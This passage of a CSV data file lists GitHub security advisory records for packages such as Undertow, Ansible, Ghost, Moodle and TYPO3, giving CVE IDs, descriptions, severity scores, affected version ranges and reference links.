'https://github.com/bcgit/bc-java/wiki/CVE-2020-26939'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8c36ba34e80e05eecb1f80071cc834d705616f315b634ec0c7d8f42e@%3Cissues.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/11/msg00007.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20201202-0005/'}]","{'cwe_ids': ['CWE-203'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T16:59:30Z', 'nvd_published_at': '2020-11-02T22:15:00Z'}"
+1.4.0,GHSA-p9w3-gwc2-cr49,2022-02-11T21:12:07Z,2021-04-30T17:28:52Z,,['CVE-2020-10687'],HTTP Request Smuggling in Undertow,"A flaw was discovered in all versions of Undertow before Undertow 2.2.0.Final, where HTTP request smuggling related to CVE-2017-2666 is possible against HTTP/1.x and HTTP/2 due to permitting invalid characters in an HTTP request. This flaw allows an attacker to poison a web-cache, perform an XSS attack, or obtain sensitive information from request other than their own.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.1.0.Final'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10687'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1785049'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6603513ea8afbf6857fd77ca5888ec8385d0af493baa4250e28c351c@%3Cdev.cxf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0015/'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T16:14:25Z', 'nvd_published_at': '2020-09-23T13:15:00Z'}"
+1.4.0,GHSA-923p-fr2c-g5m2,2021-08-31T21:10:29Z,2021-04-07T20:30:44Z,,['CVE-2020-1739'],Exposure of Sensitive Information to an Unauthorized Actor in Ansible,"A flaw was found in Ansible 2.7.16 and prior, 2.8.8 and prior, and 2.9.5 and prior when a password is set with the argument ""password"" of svn module, it is used on svn command line, disclosing to other users within the same node. An attacker could take advantage by reading the cmdline file from that particular PID on the procfs.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.5'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.8.8'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.17'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.7.16'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1739'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/67797'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1739'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FWDK3QUVBULS3Q3PQTGEKUQYPSNOU5M3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QT27K5ZRGDPCH7GT3DRI3LO4IVDVQUB7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3IMV3XEIUXL6S4KPLYYM4TVJQ2VNEP2/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4950'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T18:45:25Z', 'nvd_published_at': '2020-03-12T18:15:00Z'}"
+1.4.0,GHSA-7h8x-wmq2-7mff,2022-07-05T18:01:16Z,2021-04-13T15:20:20Z,,['CVE-2021-23330'],Command injection in launchpad,All versions of package launchpad are vulnerable to Command Injection via stop.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'launchpad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23330'}, {'type': 'WEB', 'url': 'https://github.com/bitovi/launchpad/issues/123%23issuecomment-732188118'}, {'type': 'WEB', 'url': 'https://github.com/bitovi/launchpad/pull/124'}, {'type': 'PACKAGE', 'url': 'https://github.com/bitovi/launchpad'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-LAUNCHPAD-1044065'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:56:57Z', 'nvd_published_at': '2021-02-01T15:15:00Z'}"
+1.4.0,GHSA-qq48-m4jx-xqh8,2021-04-21T19:54:50Z,2021-04-22T16:14:38Z,,['CVE-2020-26945'],"""Deserialization errors in MyBatis""",MyBatis before 3.5.6 mishandles deserialization of object streams leading to potential cache poisoning.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.mybatis:mybatis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26945'}, {'type': 'WEB', 'url': 'https://github.com/mybatis/mybatis-3/pull/2079'}, {'type': 'WEB', 'url': 'https://github.com/mybatis/mybatis-3/releases/tag/mybatis-3.5.6'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-21T19:54:50Z', 'nvd_published_at': '2020-10-10T20:15:00Z'}"
+1.4.0,GHSA-936x-wgqv-hhgq,2021-04-06T23:37:56Z,2021-04-13T15:51:33Z,,['CVE-2020-5811'],Authenticated path traversal in Umbraco CMS,"An authenticated path traversal vulnerability exists during package installation in Umbraco CMS <= 8.9.1 or current, which could result in arbitrary files being written outside of the site home and expected paths when installing an Umbraco package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'UmbracoCms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.9.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5811'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/research/tra-2020-59'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/163965/Umbraco-CMS-8.9.1-Traversal-Arbitrary-File-Write.html'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:37:56Z', 'nvd_published_at': '2020-12-30T16:15:00Z'}"
+1.4.0,GHSA-fxq4-r6mr-9x64,2021-04-08T16:45:47Z,2021-04-08T16:46:00Z,,[],CSRF Vuln can expose user's QRcode,"### Impact
+When a user is setting up two-factor authentication using an authenticator app, a QRcode is generated and made available via a GET request to /tf-qrcode. Since GETs do not have any CSRF protection, it is possible a malicious 3rd party could access the QRcode and therefore gain access to two-factor authentication codes. Note that the /tf-qrcode endpoint is ONLY accessible while the user is initially setting up their device. Once setup is complete, there is no vulnerability.
+
+### Patches
+This is fixed in the upcoming 4.0.0 release.
+
+### Workarounds
+You can provide your own URL for fetching the QRcode by defining SECURITY_TWO_FACTOR_QRCODE_URL and providing your own implementation (that presumably required a POST with CSRF protection). This would require changing the two-factor setup template as well.
+
+### References
+None.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Read this pull request: #423",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-Security-Too'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.4.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-fxq4-r6mr-9x64'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Flask-Security-Too'}]","{'cwe_ids': ['CWE-352'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T16:45:47Z', 'nvd_published_at': None}"
+1.4.0,GHSA-pmpr-vc5q-h3jw,2021-04-09T22:21:38Z,2021-04-13T15:21:59Z,,['CVE-2019-10805'],Exposure of Resource to Wrong Sphere in valib,valib through 2.0.0 allows Internal Property Tampering. A maliciously crafted JavaScript object can bypass several inspection functions provided by valib. Valib uses a built-in function (hasOwnProperty) from the unsafe user-input to examine an object. It is possible for a crafted payload to overwrite this function to manipulate the inspection results to bypass security checks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'valib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10805'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-VALIB-559015'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/valib'}]","{'cwe_ids': ['CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T22:21:38Z', 'nvd_published_at': '2020-02-28T21:15:00Z'}"
+1.4.0,GHSA-frxj-5j27-f8rf,2021-08-31T21:09:59Z,2021-04-20T16:44:49Z,,['CVE-2019-14905'],"Externally Controlled Reference to a Resource in Another Sphere, Improper Input Validation, and External Control of File Name or Path in Ansible","A vulnerability was found in Ansible Engine versions 2.9.x before 2.9.3, 2.8.x before 2.8.8, 2.7.x before 2.7.16 and earlier, where in Ansible's nxos_file_copy module can be used to copy files to a flash or bootflash on NXOS devices. Malicious code could craft the filename parameter to perform OS command injections. This could result in a loss of confidentiality of the system among other issues.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.16'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.8'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14905'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0216'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0218'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14905'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5BNCYPQ4BY5QHBCJOAOPANB5FHATW2BR/'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00021.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00026.html'}]","{'cwe_ids': ['CWE-20', 'CWE-610', 'CWE-668', 'CWE-73'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T14:41:23Z', 'nvd_published_at': '2020-03-31T17:15:00Z'}"
+1.4.0,GHSA-3fw4-4h3m-892h,2021-04-09T21:39:10Z,2021-04-13T15:22:19Z,,['CVE-2019-10804'],OS Command Injection in serial-number,serial-number through 1.3.0 allows execution of arbritary commands. The "cmdPrefix" argument in serialNumber function is used by the "exec" function without any validation.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'serial-number'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10804'}, {'type': 'WEB', 'url': 'https://github.com/es128/serial-number/blob/master/index.js#L106'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SERIALNUMBER-559010'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-09T21:39:10Z', 'nvd_published_at': '2020-02-28T21:15:00Z'}"
+1.4.0,GHSA-g3fq-3v3g-mh32,2021-04-13T18:40:52Z,2021-04-16T19:52:58Z,,['CVE-2021-29438'],Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in @nextcloud/dialogs,"### Impact
+
+The Nextcloud dialogs library before 3.1.2 did insufficiently escape text input passed to a toast. If your application displays toasts with user-supplied input, this could lead to a XSS vulnerability.
+
+_Note_: Nextcloud Server employs a strict Content Security Policy that mitigates the risk of these XSS vulnerabilities.
+
+### Patches
+
+The vulnerability has been patched in version 3.1.2. If you need to display HTML in the toast, explicitly pass the `options.isHTML` config flag.
+
+### Workarounds
+
+Make sure no user-supplied input flows into toasts.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@nextcloud/dialogs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nextcloud/nextcloud-dialogs/security/advisories/GHSA-g3fq-3v3g-mh32'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29438'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@nextcloud/dialogs'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T18:40:52Z', 'nvd_published_at': '2021-04-13T20:15:00Z'}"
+1.4.0,GHSA-vcg8-98q8-g7mj,2021-08-31T21:10:59Z,2021-04-07T21:47:31Z,,['CVE-2020-1740'],Exposure of Sensitive Information to an Unauthorized Actor and Insecure Temporary File in Ansible,"A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files. When a user executes ""ansible-vault edit"", another user on the same computer can read the old and new secret, as it is created in a temporary file with mkstemp and the returned file descriptor is closed and the method write_data is called to write the existing secret in the file. This method will delete the file before recreating it insecurely. All versions in 2.7.x, 2.8.x and 2.9.x branches are believed to be vulnerable.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.17'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.11'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1740'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/67798'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/commit/28f9fbdb5e281976e33f443193047068afb97a9b'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1740'}, {'type': 'PACKAGE', 'url': 'https://github.com/ansible/ansible'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/05/msg00005.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DKPA4KC3OJSUFASUYMG66HKJE7ADNGFW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MRRYUU5ZBLPBXCYG6CFP35D64NP2UB2S/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WQVOQD4VAIXXTVQAJKTN7NUGTJFE2PCB/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202006-11'}]","{'cwe_ids': ['CWE-200', 'CWE-377'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T15:41:07Z', 'nvd_published_at': '2020-03-16T16:15:00Z'}"
+1.4.0,GHSA-3gqj-cmxr-p4x2,2023-09-01T10:15:02Z,2021-04-30T17:32:28Z,,['CVE-2016-1000111'],Forced Browsing in Twisted,"Twisted before 16.3.1 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect CGI applications from the presence of untrusted client data in the `HTTP_PROXY` environment variable, which might allow remote attackers to redirect a CGI application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an `httpoxy` issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Twisted'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '16.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-1000111'}, {'type': 'PACKAGE', 'url': 'https://github.com/twisted/twisted'}, {'type': 'WEB', 'url': 'https://twistedmatrix.com/pipermail/twisted-web/2016-August/005268.html'}, {'type': 'WEB', 'url': 'https://twistedmatrix.com/trac/ticket/8623'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2016/07/18/6'}, {'type': 'WEB', 'url': 'http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html'}]","{'cwe_ids': ['CWE-425'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-23T20:33:04Z', 'nvd_published_at': '2020-03-11T20:15:00Z'}"
+1.4.0,GHSA-f248-v4qh-x2r6,2023-08-31T16:38:53Z,2021-04-20T16:29:41Z,,['CVE-2020-27589'],Improper Certificate Validation in blackduck,Synopsys hub-rest-api-python (aka blackduck on PyPI) version 0.0.25 - 0.0.52 does not validate SSL certificates in certain cases.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'blackduck'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.25'}, {'fixed': '0.0.53'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27589'}, {'type': 'WEB', 'url': 'https://github.com/blackducksoftware/hub-rest-api-python/pull/113/commits/273b27d0de1004389dd8cf43c40b1197c787e7cd'}, {'type': 'WEB', 'url': 'https://community.synopsys.com/s/question/0D52H00005JCZAXSA5/announcement-black-duck-defect-identified'}, {'type': 'PACKAGE', 'url': 'https://github.com/blackducksoftware/hub-rest-api-python'}, {'type': 'WEB', 'url': 'https://pypi.org/project/blackduck/'}, {'type': 'WEB', 'url': 'https://www.optiv.com/explore-optiv-insights/source-zero/certificate-validation-disabled-black-duck-api-wrapper'}]","{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T23:38:37Z', 'nvd_published_at': '2020-11-06T14:15:00Z'}"
+1.4.0,GHSA-9fgx-q25h-jxrg,2022-11-21T19:46:10Z,2021-04-29T21:53:18Z,,['CVE-2021-29484'],DOM XSS in Theme Preview,"### Impact
+An unused endpoint added during the development of 4.0.0 has left sites vulnerable to untrusted users gaining access to Ghost Admin. Attackers can gain access by getting logged in users to click a link containing malicious code. Users do not need to enter credentials and may not know they've visited a malicious site.
+
+Ghost(Pro) has already been patched. We can find no evidence that the issue was exploited on Ghost(Pro) prior to the patch being added.
+
+Self-hosters are impacted if running Ghost a version between 4.0.0 and 4.3.2. Immediate action should be taken to secure your site - see patches & workarounds below.
+
+### Patches
+Fixed in 4.3.3, all 4.x sites should upgrade as soon as possible.
+As the endpoint is unused, the patch simply removes it.
+
+### Workarounds
+- Log out of Ghost Admin
+- Suspend any users who cannot log out
+- Block access to `/ghost/preview`
+
+Example of how to block access in nginx:
+
+```
+location ~ /ghost/preview {
+ rewrite ^(\/(.*\/)?ghost\/)(.*)$ $1 redirect;
+}
+```
+
+This redirects the endpoint to `/ghost/`, which mimics the behaviour after the patch is applied.
+
+### References
+
+- [Forum Post](https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290)
+
+### For more information
+If you have any questions or comments about this advisory:
+* email us at security@ghost.org
+
+
+---
+Credits: Paul Gerste, SonarSource (https://www.sonarsource.com/)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ghost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/security/advisories/GHSA-9fgx-q25h-jxrg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29484'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/commit/14b3431de12e674a0bd562e9230e2891b6903ae2'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/ghost-admin-takeover'}, {'type': 'WEB', 'url': 'https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290'}, {'type': 'PACKAGE', 'url': 'https://github.com/TryGhost/Ghost'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210618-0006/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/ghost'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-29T20:40:06Z', 'nvd_published_at': '2021-04-29T21:15:00Z'}"
+1.4.0,GHSA-pgcp-m69h-p2gr,2021-03-24T23:15:17Z,2021-03-29T20:43:08Z,,['CVE-2020-25702'],Cross-site Scripting (XSS) in moodle,"In Moodle, it was possible to include JavaScript when re-naming content bank items. Versions affected: 3.9 to 3.9.2. This is fixed in moodle 3.9.3 and 3.10.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25702'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/66be08216e647532b295a9132070d2435ecd7ad9'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1895437'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4NNFCHPPHRJNJROIX6SYMHOC6HMKP3GU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B55KXBVAT45MDASJ3EK6VIGQOYGJ4NH6/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=413940'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:15:17Z', 'nvd_published_at': '2020-11-19T17:15:00Z'}"
+1.4.0,GHSA-g4rf-pc26-6hmr,2021-03-29T17:37:02Z,2021-03-23T15:26:49Z,,['CVE-2021-21377'],OMERO webclient does not validate URL redirects on login or switching group.,"### Background
+OMERO.web supports redirection to a given URL after performing login or switching the group context. These URLs are not validated, allowing redirection to untrusted sites. OMERO.web 5.9.0 adds URL validation before redirecting. External URLs are not considered valid, unless specified in the ``omero.web.redirect_allowed_hosts`` setting.
+
+### Impact
+OMERO.web before 5.9.0
+
+### Patches
+5.9.0
+
+### Workarounds
+No workaround
+
+### References
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [omero-web](https://github.com/ome/omero-web)
+* Email us at [security](mailto:security@openmicroscopy.org.uk)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'omero-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ome/omero-web/security/advisories/GHSA-g4rf-pc26-6hmr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21377'}, {'type': 'WEB', 'url': 'https://github.com/ome/omero-web/commit/952f8e5d28532fbb14fb665982211329d137908c'}, {'type': 'WEB', 'url': 'https://github.com/ome/omero-web/blob/master/CHANGELOG.md#590-march-2021'}, {'type': 'WEB', 'url': 'https://pypi.org/project/omero-web/'}, {'type': 'WEB', 'url': 'https://www.openmicroscopy.org/security/advisories/2021-SV2/'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:25:55Z', 'nvd_published_at': '2021-03-23T16:15:00Z'}"
+1.4.0,GHSA-4jhw-2p6j-5wmp,2021-03-29T18:07:53Z,2021-03-23T01:53:35Z,,['CVE-2021-21338'],Open Redirection in Login Handling,"
+### Problem
+It has been discovered that Login Handling is susceptible to open redirection which allows attackers redirecting to arbitrary content, and conducting phishing attacks. No authentication is required in order to exploit this vulnerability.
+
+### Solution
+Update to TYPO3 versions 6.2.57, 7.6.51, 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described.
+
+### Credits
+Thanks to Alexander Kellner who reported this issue and to TYPO3 security team member Torben Hansen who fixed the issue.
+
+### References
+* [TYPO3-CORE-SA-2021-001](https://typo3.org/security/advisory/typo3-core-sa-2021-001)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.57'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.2.56'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.6.51'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.6.50'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.40'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.7.39'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.25'}]}], 'database_specific': {'last_known_affected_version_range': '<= 9.5.24'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.14'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.13'}}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 11.1.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-4jhw-2p6j-5wmp'}, {'type': 'ADVISORY', 'url': 